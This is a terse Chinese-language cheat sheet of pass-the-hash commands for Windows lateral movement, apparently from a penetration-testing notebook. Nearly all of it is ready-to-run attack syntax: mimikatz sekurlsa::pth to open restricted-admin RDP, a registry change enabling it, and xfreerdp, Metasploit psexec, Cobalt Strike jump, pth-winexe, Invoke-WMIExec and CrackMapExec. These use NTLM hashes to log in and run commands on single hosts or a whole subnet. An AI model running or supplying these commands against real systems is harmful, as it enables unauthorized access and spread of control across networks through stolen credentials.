pth常用工具
实现rdp
windows
privilege::debug
sekurlsa::pth /user:administrator /domain:remoteserver /ntlm:d25ecd13fddbb542d2e16da4f9e0333d "/run:mstsc.exe /restrictedadmin"
kali
开启注册表允许pth
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
xfreerdp /u:administrator /pth:d25ecd13fddbb542d2e16da4f9e0333d /v:192.168.62.136 /cert-ignore
PTH
msf
psexec psexec_pth psexec_command
cs
jump psexec 10.10.10.10 c2
kali
pth-winexe -U Administrator%d747b7b8037e8669c771f6a9d803419b:86c01dc8633fc387a503b05615f8afb1 //192.168.1.178 cmd
powershell
https://github.com/Kevin-Robertson/Invoke-TheHash/
Invoke-WMIExec -Target 192.168.1.161 -Domain WORKGROUP -Username Yoga -Hash AAD3B435B51404EEAAD3B435B51404EE:14CE14C36F1F350380B41C6F4D42BC06 -Command "calc.exe" -verbose
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec
pip install crackmapexec
批量pth
crackmapexec 192.168.0.0/24 -u administrator -H d747b7b8037e8669c771f6a9d803419b:86c01dc8633fc387a503b05615f8afb1
执行命令
crackmapexec smb 192.168.1.161 -u Yoga -H AAD3B435B51404EEAAD3B435B51404EE:14CE14C36F1F350380B41C6F4D42BC06 --exec-method wimexec -x whoami
#参考文章
https://yoga7xm.top/2019/04/12/IPentest-domain3/